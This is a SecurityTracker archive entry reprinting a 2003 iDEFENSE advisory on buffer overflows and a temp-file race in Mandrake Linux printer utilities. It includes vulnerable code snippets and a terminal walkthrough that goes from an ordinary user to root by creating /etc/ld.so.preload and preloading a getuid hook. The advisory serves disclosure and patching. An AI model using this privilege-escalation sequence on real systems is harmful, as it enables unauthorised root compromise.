SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Printer-drivers Vendors:   Mandriva/Mandrake
Mandrake Linux 'printer-drivers' Package May Yield Root Privileges to Local Users
SecurityTracker Alert ID:  1005959
SecurityTracker URL:  http://securitytracker.com/id/1005959
CVE Reference:   CVE-2003-0034, CVE-2003-0035, CVE-2003-0036   (Links to External Site)
Updated:  Jun 15 2008
Original Entry Date:  Jan 21 2003
Impact:   Execution of arbitrary code via local system, Modification of system information, Modification of user information, Root access via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  

Description:   Some vulnerabilities were reported in the 'printer-drivers' package distributed with Mandrake Linux. A local user could obtain root privileges on the system.

iDEFENSE reported bugs in several binaries included in the printer-drivers package.

A buffer overflow was reported in 'mtink' in the processing of the HOME environment variable. A local user can supply a specially crafted HOME environment variable to execute arbitrary code with 'sys' group privileges.

A buffer overflow was reported in 'escputil' in the parsing of the 'printer name' command line argument. A local user can supply a specially crafted printer name value to execute arbitrary code with 'sys' group privileges.

A race condition in the use of temporary files was reported in 'm185p'. A local user with 'sys' group privileges could create a symbolic link from a predictable temporary file name to a critical file on the system or to an arbitrary file name. Then, when the binary is invoked, it will delete the contents of the linked file or create the specified arbitrary file with world-writable permissions. The local user could obtain root level privileges.

Impact:   A local user may be able to obtain 'sys' group privileges on the system. A local user with 'sys' group privileges may be able to obtain root level privileges on the system.
Solution:   The vendor has released a fix. See the Message History for a separate alert covering the Mandrake advisory or view the Mandrake advisory directly at:

http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:010

Vendor URL:  www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:010 (Links to External Site)
Cause:   Access control error, Boundary error, State error
Underlying OS:   Linux (Mandriva/Mandrake)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Mandrake Issues Fix) Mandrake Linux 'printer-drivers' Package May Yield Root Privileges to Local Users   (Mandrake Linux Security Team <security@linux-mandrake.com>)
Mandrake has released a fix.



 Source Message Contents

Date:  Tue, 21 Jan 2003 13:59:21 -0500
Subject:  [VulnWatch] iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux printer-drivers Package


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux
printer-drivers Package
http://www.idefense.com/advisory/01.21.03.txt
January 21, 2003

I. BACKGROUND

MandrakeSoft Inc.'s Mandrake Linux includes the printer-drivers package in
most default installations. Specifically, the following three binaries are
included:

mtink: a status monitor that tracks remaining ink quantity, printing of
test patterns, and changing and cleaning cartridges, etc. It is maintained
by Jean-Jacques Sarton (jj.sarton@t-online.de).

escputil: a utility to clean and align the heads of Epson Stylus printers.
It also checks current ink levels in the printer. It is maintained by
Robert Krawitz (rlk@alum.mit.edu) and Mike Sweet.

ml85p: a Linux driver for Samsung ML-85G series printers. It is maintained
by Rildo Pragana (rildo@pragana.net).


II. DESCRIPTION

Three vulnerabilities exist, the worst of which allows local root
compromise of a target system.

VULNERABILITY ONE: The mtink binary, installed set group id (gid) 'sys',
contains a buffer overflow in its handling of the HOME environment
variable. Successful exploitation provides an attacker with 'sys' group
privileges. The following snippet contains the offending segment of code:

void readRc(int idx)
{
    FILE *fp;
    char rcPath[1024];
    ...
    sprintf(rcPath,"%s/.mtinkrc",getenv("HOME"));

VULNERABILITY TWO: The escputil binary, installed set gid 'sys',contains a
buffer overflow in its parsing of the printer-name command line argument.
Successful exploitation provides an attacker with 'sys' group privileges.

VULNERABILITY THREE: The ml85p binary, installed set user id root,
contains a race condition in its opening of temporary files. Successful
exploitation provides an attacker with the ability to create or empty a
file with super user privileges. The following snippet contains the
offending segment of code:

sprintf(gname,"/tmp/mlg85p%d",time(0));
    if (!(cbmf = fopen(gname,"w+"))) {

An attacker can easily guess the name of a temporary file and then link
the guessed file to a file at another location. If the other file does not
exist, it is created world-writeable; if it does exist, the contents of
the file are lost. ml85p is, by default, installed without execute
permissions for 'other':

$ ls -l /usr/bin/ml85p
- -rwsr-x--- 1 root sys 12344 Sep 17 12:40 /usr/bin/ml85p*

The binary, however, does provide execute permissions to the 'sys' group,
whose privileges can be gained using either of the two exploits in
VULNERABILITY ONE or TWO. Once 'sys' privileges are obtained, an attacker
can exploit this race condition.

The following example walks through a sample attack utilizing the
above-described methods:

$ id
uid=501(farmer) gid=501(farmer) groups=501(farmer)

$ ./escputil_ex
Usage : ./escputil_ex [offset]
Address : 0xbffff6b0
Exploiting...
Escputil version 4.2.2, Copyright (C) 2000-2001 Robert Krawitz
Escputil comes with ABSOLUTELY NO WARRANTY; for details type 'escputil -l'
This is free software, and you are welcome to redistribute it
under certain conditions; type 'escputil -l' for details.
Cleaning heads...
lpr: unable to print file: client-error-not-found
/etc/profile.d/alias.sh:31: parse error: condition expected: !=

$ id
uid=501(farmer) gid=501(farmer) egid=3(sys) groups=501(farmer)

$ ls -l /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

$ ./ml85p_ex /etc/ld.so.preload
Press a key to clean/create /etc/ld.so.preload file
Wrong file format.
file position: ffffffff

$ ls -l /etc/ld.so.preload
- -rw-rw-rw- 1 root sys 0 Oct 21 09:09 /etc/ld.so.preload

$ cat > /tmp/lib.c < heredoc> int getuid(void) { return 0; }
heredoc> EOF

$ gcc -fPIC -c /tmp/lib.c
$ gcc -o /tmp/lib.so -shared /tmp/lib.o

$ echo "/tmp/lib.so" > /etc/ld.so.preload

$ su -

# id
uid=0(root) gid=0(root) groups=0(root)


III. ANALYSIS

Any attacker with local access to a targeted system can launch this
attack. The ability to empty or create with root privileges any file on
the file system provides an attacker with many avenues of exploitation.
The above-described example is just one way of quickly gaining super user
privileges on a targeted system.


IV. DETECTION

Mandrake Linux 9.0 is vulnerable. By default, it includes the following
versions of the printer-drivers package:

printer-utils-1.0-76mdk
printer-filters-1.0-76mdk


V. VENDOR FIX / RESPONSE

MandrakeSoft has identified the problems and applied author-provided fixes
to the escputil and mtink vulnerabilities.  A patch written by Till
Kamppeter was applied to ml85p to fix that vulnerability.  Updates are
provided for Mandrake Linux 8.1 through 9.0 for the printer-drivers
packages, and ghostscript in 8.0 to fix these vulnerabilities
(MDKSA-2003:010).


VI. DISCLOSURE TIMELINE

10/06/2002      Issues disclosed to iDEFENSE
12/26/2002      Issues disclosed to jj.sarton@t-online.de, 
                rlk@alum.mit.edu, rildo@pragana.net, and 
                security@linux-mandrake.com
12/26/2002      Issues disclosed to iDEFENSE clients
12/26/2002      Vendor responses from rlk@alum.mit.edu, 
                jj.sarton@t-online.de
12/30/2002      Response from Vincent Danen (vdanen@mandrakesoft.com)
01/21/2003      Coordinated public disclosure


VIII. CREDIT

Karol Wiesek (appelast@bsquad.sm.pl) discovered these vulnerabilities.



Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world  from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide 
decision-makers, frontline security professionals and network 
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com .

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xE4A96E4F

iQA/AwUBPi2Xuvrkky7kqW5PEQJ3hACgmjVD0byEeUAiFdrWtRnzbcuVe9IAoP4n
seYz8DLDxY5k9zWJhd6WoGJW
=WOHM
-----END PGP SIGNATURE-----



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC